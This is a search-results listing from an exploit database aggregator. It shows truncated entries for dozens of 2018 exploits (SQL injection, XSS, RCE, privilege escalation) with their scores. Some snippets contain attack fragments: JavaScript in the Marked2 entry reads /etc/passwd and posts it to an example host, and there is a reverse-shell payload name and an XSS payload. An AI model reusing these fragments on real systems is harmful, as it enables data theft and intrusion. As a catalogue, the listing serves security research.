Lucene search
+L
ExploitdbRecent

47904 matches found

exploitdb
exploitdb
added 2018/02/15 12:0 a.m.28 views

Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow

/ Here's a snippet of the method. ASSIGNRETURNFAILUREONEXCEPTION isolate, captureslengthobj, Object::ToLengthisolate, captureslengthobj; const int captureslength = PositiveNumberToUint32captureslengthobj; ... if functionalreplace const int argc = hasnamedcaptures ? captureslength + 3 :...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.97 views

Dell EMC Isilon OneFS - Multiple Vulnerabilities

Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Dell EMC Isilon OneFS Multiple Vulnerabilities 1. Advisory Information Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL:...

8.8CVSS5.5AI score0.287EPSS
Exploits13
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.26 views

userSpice 4.3 - Cross-Site Scripting

Application UserSpice PHP user management Vulnerability userSpice alert"1"&csrf=8b1339546d6af1e7536da0a705302e9c&updatebio= Vulnerable code: id?" class="nounderline"id?...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.36 views

Social Oauth Login PHP - Authentication Bypass

Exploit Title: Social Oauth Login PHP - Authentication Bypass Dork: N/A Date: 2018-02-12 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.codester.com/items/4554/social-oauth-login-php Version: All version Category: Webapps CVE: N/A Description:...

7AI score
Exploits0
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.80 views

SOA School Management - 'access_login' SQL Injection

Exploit Title: SOA - School Management Software with Integrated Parents/Students Portal & Mobile App - 'accesslogin' SQL Injection Dork: N/A Date: 2018-02-14 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.49 views

GNU binutils 2.26.1 - Integer Overflow (PoC)

Exploit Title: Objdump - Integer Overflow Crash POC Date: 12.02.2018 Exploit Author: r4xis Tested Version: 2.26.1 Vuln Version: \nint mainprintf"HelloWorld!\n"; return 0;" f = open"helloWorld.c", 'w' f.writehello f.close os.system"gcc -c helloWorld.c -o test" file test test: ELF 32-bit LSB...

7.8CVSS6.7AI score0.05834EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.81 views

NAT32 2.2 Build 22284 - Cross-Site Request Forgery

Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt + ISR: Apparition Security -- D1rty0tis Vendor: ============= www.nat32.com Product: =========== NAT32 Build 22284 NAT32® is a...

8.8CVSS8.8AI score0.03544EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.60 views

NAT32 2.2 Build 22284 - Remote Command Execution

Credits: hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt + ISR: Apparition Security -- D1rty0tis Vendor: ============= www.nat32.com Product: ================= NAT32 Build 22284 NAT32 is a...

6.1CVSS6.3AI score0.02828EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/14 12:0 a.m.51 views

Tenda AC15 Router - Remote Code Execution

!/usr/bin/env python EDB Note Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ import urllib2 import struct import time import socket from optparse import import SimpleHTTPServer import SocketServer import threading import sys import os import subprocess ARMREVSHELL =...

9.8CVSS9.6AI score0.48013EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.30 views

Flash ActiveX 18.0.0.194 - Code Execution

CVE-2015-5112 Pop up a calculator - Requires Flash ActiveX 18.0.0.194 Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44742.swf...

7AI score
Exploits3
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.56 views

CloudMe Sync < 1.11.0 - Buffer Overflow

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt + ISR: Apparition Security + SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669...

9.8CVSS8.7AI score0.93597EPSS
Exploits29
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.20 views

TypeSetter CMS 5.1 - Cross-Site Request Forgery

Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1 CVE : NA Category: Webapp CMS 1...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.29 views

News Website Script 2.0.4 - 'search' SQL Injection

Exploit Title:News Website Script - SQL Injection Error Based Google Dork: NA Date: 12.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://under24usd.com/demo/newstoday/index.php Version: 2.0.4 Tested on: Windows 7 Category: Webapps CVE : N...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.41 views

Advantech WebAccess 8.3.0 - Remote Code Execution

Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution Discovered by: Nassim Asrir Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/ CVE: CVE-2018-6911 Tested on: IE11 / Win10 Technical Details: ================== The VBWinExec...

10CVSS7AI score0.13034EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/13 12:0 a.m.27 views

TypeSetter CMS 5.1 - 'Host' Header Injection

​ Exploit Title: TypeSetter CMS 5.1 Host Header Injection Date: 10-02-2018 Exploit Author: Navina Asrani Contact: https://twitter.com/NavinaSanjay Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.typesettercms.com/ Version: 5.1 CVE : NA Category: Webapp CMS 1. Descripti...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.35 views

LogicalDOC Enterprise 7.7.4 - Directory Traversal

LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle...

7AI score
Exploits0
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.37 views

Juju-run Agent - Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Juju-run Agent Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Juju agent systems running the juju-run...

10CVSS7.4AI score0.48501EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.33 views

LogicalDOC Enterprise 7.7.4 - User Enumeration

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle and share...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.34 views

LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution

LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designe...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.74 views

glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class MetasploitModule 'glibc LDAUDIT Arbitrary DSO Load Privilege Escalation', 'Description' = %q...

8.3AI score
Exploits0
exploitdb
exploitdb
added 2018/02/12 12:0 a.m.44 views

glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/linux' require 'msf/core/exploit/exe' class MetasploitModule "glibc '$ORIGIN' Expansion Privilege Escalation", 'Description' = %q This...

6.9CVSS8.9AI score0.08747EPSS
Exploits20
exploitdb
exploitdb
added 2018/02/11 12:0 a.m.32 views

Readymade Video Sharing Script 3.2 - 'search' SQL Injection

Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Version: 3.2 Tested on: Windows...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/11 12:0 a.m.56 views

Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection

Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/ Version: 1.0.9 Category: Webapps CVE: N/...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.69 views

Facebook Clone Script 1.0.5 - Cross-Site Scripting

Facebook Clone Script 1.0.5 - Cross-Site Scripting. CVE-2018-6858. Webapps exploit for PHP platform Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/...

5.4CVSS5.9AI score0.00558EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.37 views

Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting

Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting. CVE-2018-6864. Webapps exploit for PHP platform Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

5.4CVSS5.9AI score0.00568EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.26 views

Select Your College Script 2.0.2 - Authentication Bypass

Select Your College Script 2.0.2 - Authentication Bypass. CVE-2018-6863. Webapps exploit for PHP platform Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software...

9.8CVSS9.4AI score0.01511EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.39 views

Bitcoin MLM Software 1.0.2 - Cross-Site Scripting

Bitcoin MLM Software 1.0.2 - Cross-Site Scripting. CVE-2018-6862. Webapps exploit for PHP platform Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/ Category:...

5.4CVSS5.9AI score0.00681EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.128 views

JBoss 4.2.x/4.3.x - Information Disclosure

JBoss 4.2.x/4.3.x - Information Disclosure. CVE-2010-1429. Remote exploit for Multiple platform Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X Date: 02/08/2018 Exploit Author: JameelNabbo Vendor Homepage: http://www.jboss.org Software Link: http://jbossas.jboss.org/downloads...

5CVSS9.4AI score0.53728EPSS
Exploits8
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.30 views

Lawyer Search Script 1.0.2 - Cross-Site Scripting

Lawyer Search Script 1.0.2 - Cross-Site Scripting. CVE-2018-6861. Webapps exploit for PHP platform Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/lawyer-script/...

5.4CVSS5.9AI score0.00558EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.38 views

Schools Alert Management Script 2.0.2 - Arbitrary File Upload

Schools Alert Management Script 2.0.2 - Arbitrary File Upload. CVE-2018-6860. Webapps exploit for PHP platform Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...

8.8CVSS8.8AI score0.0252EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.27 views

Naukri Clone Script 3.0.3 - 'indus' SQL Injection

Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version: 3.0.3 Category: Webapps CVE: N/A Description: Th...

7AI score
Exploits0
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.73 views

LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure

Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to obtain data by URL, usually used as:...

9.8CVSS9.6AI score0.23204EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/10 12:0 a.m.25 views

Multi Language Olx Clone Script - Cross-Site Scripting

Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web Application Version:2.0.6 Tested on: Windows 7 CVE: NA...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/09 12:0 a.m.35 views

macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'

/ AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort method: text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPortipcport , unsigned int,...

7AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.36 views

Naukri Clone Script - Persistent Cross-Site Scripting

Naukri Clone Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Naukri Clone Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage:...

6.2AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.29 views

Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting

Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...

6.2AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.30 views

Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting

Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting. CVE-2018-6655. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web:...

5.4CVSS5.5AI score0.00554EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.27 views

Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting

Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...

6.2AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.90 views

Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption

Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory exhaustion The vulnerability is due to an error when the...

7.5CVSS7.7AI score0.81511EPSS
Exploits4
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.19 views

Entrepreneur Dating Script 2.0.2 - Authentication Bypass

Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ Version: 2.0.2 Category: Webapps CVE: N/A...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.24 views

Online Test Script 2.0.7 - 'cid' SQL Injection

Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7 Category: Webapps CVE: N/A Description: The...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.129 views

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution

Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe Coldfusion 11.0.03.292866 Tested On: Windows 10 Enterprise 10.0.15063 CVE: CVE-2017-3066...

10CVSS9.5AI score0.90597EPSS
Exploits6
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.37 views

MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation

/ Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE: CVE-2018-6606 / include include include BOOL...

7.8CVSS7.7AI score0.01208EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.121 views

Cisco ASA - Crash (PoC)

Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...

10CVSS9.5AI score0.87138EPSS
Exploits7
exploitdb
exploitdb
added 2018/02/07 12:0 a.m.110 views

Android - 'getpidcon' Permission Bypass in KeyStore Service

The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/06 12:0 a.m.19 views

Marked2 - Local File Disclosure

var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest; xhr.open'POST', extract, true; xhr.onload...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/05 12:0 a.m.24 views

NixCMS 1.0 - 'category_id' SQL Injection

Exploit Title: NixCMS 1.0 - 'categoryid' SQL Ýnjection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan Author WebSite : http://borabozdogan.net....

7.4AI score
Exploits0
exploitdb
exploitdb
added 2018/02/05 12:0 a.m.119 views

HPE iLO 4 < 2.53 - Add New Administrator User

!/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769enus Other...

10CVSS9.5AI score0.99335EPSS
Exploits9
exploitdb
exploitdb
added 2018/02/05 12:0 a.m.38 views

Joomla! Component jLike 1.0 - Information Leak

"; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...

7.5CVSS7.6AI score0.08069EPSS
Exploits5
exploitdb
exploitdb
added 2018/02/05 12:0 a.m.50 views

Joomla! Component JSP Tickets 1.1 - SQL Injection

Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ Version: 1.1 Category: Webapps Tested on:...

9.8CVSS9.6AI score0.02703EPSS
Exploits5
Total number of security vulnerabilities47904